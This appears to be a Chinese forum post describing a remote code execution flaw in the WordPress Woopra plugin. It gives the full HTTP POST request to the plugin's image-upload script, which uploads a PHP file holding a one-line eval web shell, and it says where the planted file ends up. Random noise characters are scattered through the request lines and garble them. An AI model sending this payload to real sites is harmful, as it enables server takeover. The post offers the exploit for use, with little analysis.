|
照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/ % N6 }6 F( v' a2 U- V; d4 j
此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip
# r% A# z2 q& Y. c: Wexp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
0 I) E9 p; h/ O, i% K, Y$ yHost: ha.cker.in# y; q! n" e3 y# X9 K. Y9 r& i
Proxy-Connection: keep-alive
, Y! K; Z. t0 R# Q+ r- {Cache-Control: max-age=0
9 R. p3 i9 p* t/ i! K/ ?# nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
; d0 o4 [" q- AUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36& v5 i8 k% v/ f* } P! R" W
Accept-Encoding: gzip,deflate,sdch7 U! x' {5 D* ` d# [
Accept-Language: zh-CN,zh;q=0.89 W9 s& R& V& j9 f
Content-Length: 28 <?php eval($_POST['cmd']); ?> ) ^; I$ k" f' K7 P
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
% `6 H# Q7 f+ g* @4 M | 
发表于 2013-10-13 13:06:55
收藏
支持
反对